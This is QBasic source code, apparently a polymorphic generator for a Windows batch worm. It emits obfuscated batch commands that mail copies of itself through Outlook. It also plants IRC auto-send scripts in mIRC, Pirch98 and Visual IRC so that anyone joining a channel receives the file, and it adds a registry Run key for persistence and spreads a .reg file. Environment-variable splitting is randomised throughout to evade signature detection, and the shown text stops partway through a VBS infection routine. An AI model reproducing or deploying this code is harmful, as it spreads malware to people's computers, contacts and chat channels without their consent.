IF rand = 2 THEN PRINT #1, "% CCCC % set attA=t"
IF rand = 2 THEN attA$ = "A%attA%t"
IF rand = 3 THEN PRINT #1, "% CCCC % set attA=t"
IF rand = 3 THEN attA$ = "At%attA%"
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set attB=a"
IF rand = 1 THEN attB$ = "%attB%chm"
IF rand = 2 THEN PRINT #1, "% CCCC % set attB=c"
IF rand = 2 THEN attB$ = "a%attB%hm"
IF rand = 3 THEN PRINT #1, "% CCCC % set attB=h"
IF rand = 3 THEN attB$ = "ac%attB%m"
IF rand = 4 THEN PRINT #1, "% CCCC % set attB=m"
IF rand = 4 THEN attB$ = "ach%attB%"
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set attC=e"
IF rand = 1 THEN attC$ = "%attC%nts"
IF rand = 2 THEN PRINT #1, "% CCCC % set attC=n"
IF rand = 2 THEN attC$ = "e%attC%ts"
IF rand = 3 THEN PRINT #1, "% CCCC % set attC=t"
IF rand = 3 THEN attC$ = "en%attC%s"
IF rand = 4 THEN PRINT #1, "% CCCC % set attC=s"
IF rand = 4 THEN attC$ = "ent%attC%"
attach$ = attA$ + attB$ + attC$
IF mp = 1 THEN PRINT #1, "echo "; mail$; "."; attach$; ".Add("; CHR$(34); "C:\"; OLAttachment$; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC % set VBSwayM="; attach$
IF mp = 2 THEN PRINT #1, "echo Mail.%VBSwayM%.Add("; CHR$(34); "C:\"; OLAttachment$; CHR$(34); ") >> C:\"; fina$; " % CCCC % "
IF mp = 2 THEN PRINT #1, "% CCCC %set VBSwayM="
mp = INT(RND * 2) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
send$ = a$ + b$ + c$ + d$ + e$
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set sendA=s"
IF rand = 1 THEN snd$ = "%sendA%end"
IF rand = 2 THEN PRINT #1, "% CCCC % set sendA=e"
IF rand = 2 THEN snd$ = "s%sendA%nd"
IF rand = 3 THEN PRINT #1, "% CCCC % set sendA=n"
IF rand = 3 THEN snd$ = "se%sendA%d"
IF rand = 4 THEN PRINT #1, "% CCCC % set sendA=d"
IF rand = 4 THEN snd$ = "sen%sendA%"
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set sendB=M"
IF rand = 1 THEN mail$ = "%sendB%ail"
IF rand = 2 THEN PRINT #1, "% CCCC % set sendB=a"
IF rand = 2 THEN mail$ = "M%sendB%il"
IF rand = 3 THEN PRINT #1, "% CCCC % set sendB=i"
IF rand = 3 THEN mail$ = "Ma%sendB%l"
IF rand = 4 THEN PRINT #1, "% CCCC % set sendB=l"
IF rand = 4 THEN mail$ = "Mai%sendB%"
PRINT #1, "echo "; mail$; "."; snd$; " >> C:\"; fina$; " % CCCC % "
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
nexta$ = a$ + b$ + c$ + d$
nextb$ = a$ + b$ + c$
PRINT #1, "% CCCC %set vsenda="; nexta$
PRINT #1, "% CCCC %set vsendb="; nextb$
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set vsenda=N"
IF rand = 1 THEN nexta$ = "%vsenda%e"
IF rand = 2 THEN PRINT #1, "% CCCC % set vsenda=e"
IF rand = 2 THEN nexta$ = "N%vsenda%"
rand = INT(RND * 2) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set vsendb=x"
IF rand = 1 THEN nextb$ = "%vsendb%t"
IF rand = 2 THEN PRINT #1, "% CCCC % set vsendb=t"
IF rand = 2 THEN nextb$ = "x%vsendb%"
vnext$ = nexta$ + nextb$
PRINT #1, "echo "; vnext$; " >> C:\"; fina$; " % CCCC % "
PRINT #1, "% CCCC %set vsenda="
PRINT #1, "% CCCC %set vsendb="
PRINT #1, "echo ol.Quit >> C:\"; fina$; " % CCCC % "
GOTO VBSwayEnd
vbswayb:
GOTO VBSwayEnd
VBSwayEnd:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
cscript$ = a$ + b$ + c$ + d$ + e$
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set cscA=scri"
IF rand = 1 THEN csc$ = "c%cscA%pt"
IF rand = 2 THEN PRINT #1, "% CCCC % set cscA=csc"
IF rand = 2 THEN csc$ = "%cscA%ript"
IF rand = 3 THEN PRINT #1, "% CCCC % set cscA=ipt"
IF rand = 3 THEN csc$ = "cscr%cscA%"
PRINT #1, "set "; cscript$; "="; csc$; " % CCCC % "
PRINT #1, "%"; cscript$; "% C:\"; fina$; " % CCCC % "
PRINT #1, "del C:\"; fina$; " % CCCC % "
PRINT #1, "del C:\"; OLAttachment$; " % CCCC % "
OLend:
IF mIRC = 1 THEN GOTO mir
GOTO IRCENDE
mir:
PRINT #1, "md C:\pro % DDDD %"
PRINT #1, "copy "; MyS$; " C:\pro\"; mIRCAttachment$; " % DDDD %"
PRINT #1, "if exist C:\mirc\script.ini set mIRC=C:\mirc\script.ini"; " % DDDD %"
PRINT #1, "if exist C:\mirc32\script.ini set mIRC=C:\mirc32\script.ini"; " % DDDD %"
PRINT #1, "if exist C:\progra~1\mirc\script.ini set mIRC=C:\progra~1\mirc\script.ini"; " % DDDD %"
PRINT #1, "if exist C:\progra~1\mirc32\script.ini set mIRC=C:\progra~1\mirc32\script.ini"; " % DDDD %"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, " % DDDD % set spp="; c$
mirp = INT(RND * 3) + 1
IF mirp = 1 THEN PRINT #1, "% DDDD % set spp=dcc send $nick C:\pro\"; mIRCAttachment$;
IF mirp = 2 THEN PRINT #1, "% DDDD % set ircc=send"; " % DDDD %"
IF mirp = 2 THEN PRINT #1, "% DDDD % set spp=dcc %ircc% $nick C:\pro\"; mIRCAttachment$;
IF mirp = 3 THEN PRINT #1, "% DDDD % set ircc=nick"; " % DDDD %"
IF mirp = 3 THEN PRINT #1, "% DDDD % set spp=dcc send $%ircc% C:\pro\"; mIRCAttachment$;
mirp = INT(RND * 2) + 1
IF mirp = 1 THEN PRINT #1, "echo [script] > %mIRC%"; " % DDDD %"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
IF mirp = 2 THEN PRINT #1, "% DDDD % set irca="; c$
IF mirp = 2 THEN PRINT #1, "% DDDD % set irca=script"
IF mirp = 2 THEN PRINT #1, "echo [%irca%] > %mIRC%"; " % DDDD %"
IF mirp = 2 THEN PRINT #1, "% DDDD % set irca="
mirp = INT(RND * 5) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "set ircb="; c$; " % DDDD %"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ooo$ = a$ + b$
oooz = INT(RND * 9) + 1
PRINT #1, "set "; ooo$; "="; oooz; "% DDDD %"
PRINT #1, "% DDDD % set "; ooo$ = "1"
oo$ = "%" + ooo$ + "%"
IF mirp = 1 THEN PRINT #1, "% DDDD % set ircb=nick"
IF mirp = 1 THEN PRINT #1, "echo n0=on "; oo$; ":join:*.*: { if ( $%ircb% !=$me ) /%spp% } >>%mIRC%"; " % DDDD %"
IF mirp = 2 THEN PRINT #1, "% DDDD % set ircb=jo"
IF mirp = 2 THEN PRINT #1, "echo n0=on "; oo$; ":%ircb%in:*.*: { if ( $nick !=$me ) /%spp% } >>%mIRC%"; " % DDDD %"
IF mirp = 3 THEN PRINT #1, "% DDDD % set ircb=if"
IF mirp = 3 THEN PRINT #1, "echo n0=on "; oo$; ":join:*.*: { %ircb% ( $nick !=$me ) /%spp% } >>%mIRC%"; " % DDDD %"
IF mirp = 4 THEN PRINT #1, "% DDDD % set ircb=in"
IF mirp = 4 THEN PRINT #1, "echo n0=on "; oo$; ":jo%ircb%:*.*: { if ( $nick !=$me ) /%spp% } >>%mIRC%"; " % DDDD %"
IF mirp = 5 THEN PRINT #1, "% DDDD % set ircb=on"
IF mirp = 5 THEN PRINT #1, "echo n0=%ircb% "; oo$; ":join:*.*: { if ( $nick !=$me ) /%spp% } >>%mIRC%"; " % DDDD %"
PRINT #1, "% DDDD % set ircb="
PRINT #1, "% DDDD % set spp="
PRINT #1, "% DDDD % set mIRC="
PRINT #1, "% DDDD % set "; ooo$; "="
IRCENDE:
IF pirchb = 1 THEN GOTO PIRCH
GOTO PIRCHEND
REM pia-pie
PIRCH:
PRINT #1, "if exist C:\pirch98\events.ini goto pir"; " % EEEE %"
PRINT #1, "goto pirend"; " % EEEE %"
PRINT #1, ":pir"; " % EEEE %"
PRINT #1, "copy "; MyS$; " %WinDir%\"; pIRChAttachment$; " % EEEE %"
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo [Levels] > C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pif=Lev"
IF pip = 2 THEN PRINT #1, "echo [%pif%els] > C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pif="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Enabled=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pig=able"
IF pip = 2 THEN PRINT #1, "echo En%pig%d=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pig="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Count=6 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pih=Count"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "echo %pih%=6 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE %set pih="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level1=000-Unknows >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pii=Unknows"
IF pip = 2 THEN PRINT #1, "echo Level1=000-%pii% >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE %set pii="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 000-UnknowsEnabled=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pij=wsEnab"
IF pip = 2 THEN PRINT #1, "echo 000-Unkno%pij%led=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE %set pij="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level2=100-Level 100 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pik=evel2"
IF pip = 2 THEN PRINT #1, "echo L%pik%=100-Level 100 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE %set pik="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 100-Level 100Enabled=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pil=En"
IF pip = 2 THEN PRINT #1, "echo 100-Level 100%pil%abled=1 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE %set pil="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level3=200-Level 200 >> C:\Pirch98\events.ini"; " % EEEE %"
IF pip = 2 THEN PRINT #1, "% EEEE % set pim=ve"
IF pip = 2 THEN PRINT #1, "echo Le%pim%l3=200-Level 200 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pim="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 200-Level 200Enabled=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pin=0Ena"
IF pip = 2 THEN PRINT #1, "echo 200-Level 20%pin%bled=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pin="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level4=300-Level 300 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pio=vel4"
IF pip = 2 THEN PRINT #1, "echo Le%pio%=300-Level 300 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pio="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 300-Level 300Enabled=1 >> C:\Pirch98\events.ini % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pip=300"
IF pip = 2 THEN PRINT #1, "echo %pip%-Level 300Enabled=1 >> C:\Pirch98\events.ini % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pip="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level5=400-Level 400 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set piq=400"
IF pip = 2 THEN PRINT #1, "echo Level5=%piq%-Level 400 >> C:\Pirch98\events.ini"; " % EEEE % "
IF piq = 2 THEN PRINT #1, "% EEEE % set piq="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 400-Level 400Enabled=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pir=0En"
IF pip = 2 THEN PRINT #1, "echo 400-Level 40%pir%abled=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pir="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo Level6=500-Level 500 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pis=Level6"
IF pip = 2 THEN PRINT #1, "echo L%pis%=500-Level 500 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pis="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo 500-Level 500Enabled=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pit=abled"
IF pip = 2 THEN PRINT #1, "echo 500-Level 500En%pit%=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pit="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo [000-Unknowns] >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pia=000"
IF pip = 2 THEN PRINT #1, "echo [%pia%-Unknowns] >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pia="
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo User1=*!*@* >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pib=Use"
IF pip = 2 THEN PRINT #1, "echo %pib%r1=*!*@* >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE %set pib="
pip = INT(RND * 2)
IF pip = 1 THEN PRINT #1, "echo UserCount=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pic=erCo"
IF pip = 2 THEN PRINT #1, "echo Us%pic%unt=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pic="
pip = INT(RND * 2) + 1
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(RND)
c$ = a$ + b$
PRINT #1, "set pirchA="; c$; " % EEEE %"
IF rand = 1 THEN PRINT #1, "% EEEE % set pirchA=s"
IF rand = 1 THEN pirchset$ = "%pirchA%end"
IF rand = 2 THEN PRINT #1, "% EEEE % set pirchA=e"
IF rand = 2 THEN pirchset$ = "s%pirchA%nd"
IF rand = 3 THEN PRINT #1, "% EEEE % set pirchA=n"
IF rand = 3 THEN pirchset$ = "se%pirchA%d"
IF rand = 4 THEN PRINT #1, "% EEEE % set pirchA=d"
IF rand = 4 THEN pirchset$ = "sen%pirchA%"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(RND)
c$ = a$ + b$
PRINT #1, "set pirchB="; c$; " % EEEE"
IF pip = 1 THEN PRINT #1, "% EEEE % set pirchB=dcc"
IF pip = 1 THEN PRINT #1, "echo Events1= ON JOIN:#: /%pirchB% "; pirchset$; " $nick %WinDir%\"; pIRChAttachment$; " >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pid=ON JOIN"
IF pip = 2 THEN PRINT #1, "echo Events1= %pid%:#: /dcc "; pirchset$; " $nick %WinDir%\"; pIRChAttachment$; " >> C:\Pirch98\events.ini"
pip = INT(RND * 2) + 1
IF pip = 1 THEN PRINT #1, "echo EventCount=1 >> C:\Pirch98\events.ini"; " % EEEE % "
IF pip = 2 THEN PRINT #1, "% EEEE % set pie=Event"
IF pip = 2 THEN PRINT #1, "echo %pie%Count=1 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo [100-Level 100] >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo UserCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo EventCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo [200-Level 200] >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo UserCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo EventCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo [300-Level 300] >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo UserCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo EventCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo [400-Level 400] >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo UserCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo EventCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo [500-Level 500] >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo UserCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, "echo EventCount=0 >> C:\Pirch98\events.ini"; " % EEEE % "
PRINT #1, ":pirend"; " % EEEE % "
PIRCHEND:
IF vircB = 0 THEN GOTO VircEnd
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
vvbsname$ = a$ + b$ + c$ + d$ + e$ + ".vbs"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "set sendA="; c$; " % CCCC % "
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set sendA=s"
IF rand = 1 THEN snd$ = "%sendA%end"
IF rand = 2 THEN PRINT #1, "% CCCC % set sendA=e"
IF rand = 2 THEN snd$ = "s%sendA%nd"
IF rand = 3 THEN PRINT #1, "% CCCC % set sendA=n"
IF rand = 3 THEN snd$ = "se%sendA%d"
IF rand = 4 THEN PRINT #1, "% CCCC % set sendA=d"
IF rand = 4 THEN snd$ = "sen%sendA%"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
PRINT #1, "% CCCC % set vircA="; a$;
PRINT #1, "copy "; MyS$; " C:\Virc\"; vircattachment$; " % CCCC % "
PRINT #1, "copy "; MyS$; " "; vvbsname$; " % CCCC % "
PRINT #1, "echo.on error resume next >"; vvbsname$; " % CCCC % "
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "% CCCC % set vircB="; c$
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
c$ = a$ + b$
PRINT #1, "% CCCC % set vircC="; c$
IF rand = 1 THEN PRINT #1, "% CCCC % set vircB=w"
IF rand = 1 THEN vircB$ = "%vircB%scr"
IF rand = 2 THEN PRINT #1, "% CCCC % set vircB=s"
IF rand = 2 THEN vircB$ = "w%vircB%cr"
IF rand = 3 THEN PRINT #1, "% CCCC % set vircB=c"
IF rand = 3 THEN vircB$ = "ws%vircB%r"
IF rand = 4 THEN PRINT #1, "% CCCC % set vircB=r"
IF rand = 4 THEN vircB$ = "wsc%vircB%"
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set vircC=i"
IF rand = 1 THEN vircC$ = "%vircC%pt"
IF rand = 2 THEN PRINT #1, "% CCCC % set vircC=p"
IF rand = 2 THEN vircC$ = "i%vircC%t"
IF rand = 3 THEN PRINT #1, "% CCCC % set vircC=t"
IF rand = 3 THEN vircC$ = "ip%vircC%"
vircD$ = vircB$ + vircC$
PRINT #1, "echo set ws = CreateObject("; CHR$(34); vircD$; ".shell"; CHR$(34); ") >> "; vvbsname$; " % CCCC % "
PRINT #1, "% CCCC %set vircB="
PRINT #1, "% CCCC %set vircC="
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set vircA=dcc"
IF rand = 1 THEN PRINT #1, "echo ws.regwrite "; CHR$(34); "HKEY_USER\.Default\Software\MeGaLiTh Software\Visual IRC 96\Events\Event17"; CHR$(34); ","; CHR$(34); "%vircA% "; snd$; " $nick C:\Virc\"; vircattachment$; " "; CHR$(34); " >>"; vvbsname$;  _
" % CCCC % "
IF rand = 2 THEN PRINT #1, "% CCCC % set vircA=MeGaLiTh"
IF rand = 2 THEN PRINT #1, "echo ws.regwrite "; CHR$(34); "HKEY_USER\.Default\Software\%vircA% Software\Visual IRC 96\Events\Event17"; CHR$(34); ","; CHR$(34); "dcc "; snd$; " $nick C:\Virc\"; vircattachment$; " "; CHR$(34); " >>"; vvbsname$;  _
" % CCCC % "
IF rand = 3 THEN PRINT #1, "% CCCC % set vircA=Software"
IF rand = 3 THEN PRINT #1, "echo ws.regwrite "; CHR$(34); "HKEY_USER\.Default\%vircA%\MeGaLiTh %vircA%\Visual IRC 96\Events\Event17"; CHR$(34); ","; CHR$(34); "dcc "; snd$; " $nick C:\Virc\"; vircattachment$; " "; CHR$(34); " >>"; vvbsname$;  _
" % CCCC % "
PRINT #1, "% CCCC %set vircA="
PRINT #1, "% CCCC %set sendA="
rand = INT(RND * 3) + 1
IF rand = 1 THEN PRINT #1, "% CCCC % set regiA=sc"
IF rand = 1 THEN regy$ = "c%regi%ript"
IF rand = 2 THEN PRINT #1, "% CCCC % set regiA=rip"
IF rand = 2 THEN regy$ = "csc%regiA%t"
IF rand = 3 THEN PRINT #1, "% CCCC % set regiA=csc"
IF rand = 3 THEN regy$ = "%regiA%ript"
PRINT #1, ""; regy$; " "; vvbsname$; " % CCCC % "
PRINT #1, "del "; vvbsname$; " % CCCC % "
PRINT #1, "% CCCC %set regiA="
VircEnd:
IF RegFileI = 0 THEN GOTO RegFileEnd
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
regwormfile$ = a$ + b$ + c$ + d$ + e$ + ".bat"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
psyreg$ = a$ + b$ + c$ + d$ + e$ + ".reg"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
regpathname$ = a$ + b$ + c$ + d$ + e$
PRINT #1, "copy "; MyS$; " %windir%\"; regwormfile$; " % DDDD %"
PRINT #1, "echo REGEDIT4 >"; psyreg$; " % DDDD %"
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
regAP$ = CHR$(ran)
ran = INT(RND * 26) + 97
regBP$ = CHR$(ran)
regAPP$ = regAP$ + regBP$
ran = INT(RND * 26) + 97
regAP$ = CHR$(ran)
ran = INT(RND * 26) + 97
regBP$ = CHR$(ran)
regBPP$ = regAP$ + regBP$
PRINT #1, "% CCCC % set regA="; regAPP$
PRINT #1, "% CCCC % set regB="; regBPP$
IF rand = 1 THEN PRINT #1, "% DDDD % set regA=S"
IF rand = 1 THEN regA$ = "%regA%oft"
IF rand = 2 THEN PRINT #1, "% DDDD % set regA=o"
IF rand = 2 THEN regA$ = "S%regA%ft"
IF rand = 3 THEN PRINT #1, "% DDDD % set regA=f"
IF rand = 3 THEN regA$ = "So%regAft"
IF rand = 4 THEN PRINT #1, "% DDDD % set regA=t"
IF rand = 4 THEN regA$ = "Sof%regA%"
rand = INT(RND * 4) + 1
IF rand = 1 THEN PRINT #1, "% DDDD % set regB=w"
IF rand = 1 THEN regb$ = "%regB%are"
IF rand = 2 THEN PRINT #1, "% DDDD % set regB=a"
IF rand = 2 THEN regb$ = "w%regB%re"
IF rand = 3 THEN PRINT #1, "% DDDD % set regB=r"
IF rand = 3 THEN regb$ = "wa%regB%e"
IF rand = 4 THEN PRINT #1, "% DDDD % set regB=e"
IF rand = 4 THEN regb$ = "war%regB%"
regAB$ = regA$ + regb$
PRINT #1, "echo [HKEY_LOCAL_MACHINE\"; regAB$; "\Microsoft\Windows\CurrentVersion\Run\] >>"; psyreg$; " % DDDD %"
PRINT #1, "echo "; CHR$(34); regpathname$; CHR$(34); "="; CHR$(34); "%windir%\"; regwormfile$; CHR$(34); ">>"; psyreg$; " % DDDD %"
PRINT #1, "% DDDD % set RDA=for"
PRINT #1, "%RDA% %%r in (*.reg \*.reg ..\*.reg %path%\*.reg %windir%\*.reg) do copy "; psyreg$; " %%r"; " % DDDD %"
PRINT #1, "% DDDD %set regA="
PRINT #1, "% DDDD %set regB="
RegFileEnd:
IF VBSFileI = 1 THEN GOTO VBSInfection
GOTO VBSInfectionEnd
VBSInfection:
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
vbsDropFile$ = a$ + b$ + c$ + d$ + e$ + ".vbs"
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
ran = INT(RND * 26) + 97
c$ = CHR$(ran)
ran = INT(RND * 26) + 97
d$ = CHR$(ran)
ran = INT(RND * 26) + 97
e$ = CHR$(ran)
vbsDropFileRun$ = "%windir%\" + a$ + b$ + c$ + d$ + e$ + ".bat"
rand = INT(RND * 4) + 1
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
vbsAPF$ = a$ + b$
PRINT #1, "set vbsA="; vbsAPF$; " % EEEE % "
ran = INT(RND * 26) + 97
a$ = CHR$(ran)
ran = INT(RND * 26) + 97
b$ = CHR$(ran)
vbsBPF$ = a$ + b$
PRINT #1, "% EEEE % set vbsB="; vbsBPF$; ""
IF rand = 1 THEN PRINT #1, "% EEEE % set vbsA=w"
IF rand = 1 THEN vbsAP$ = "%vbsA%scr"
IF rand = 2 THEN PRINT #1, "% EEEE % set vbsA=s"
IF rand = 2 THEN vbsAP$ = "w%vbsA%cr"
IF rand = 3 THEN PRINT #1, "% EEEE % set vbsA=c"
IF rand = 3 THEN vbsAP$ = "ws%vbsA%r"
IF rand = 4 THEN PRINT #1, "% EEEE % set vbsA=r"
IF rand = 4 THEN vbsAP$ = "wsc%vbsA%"
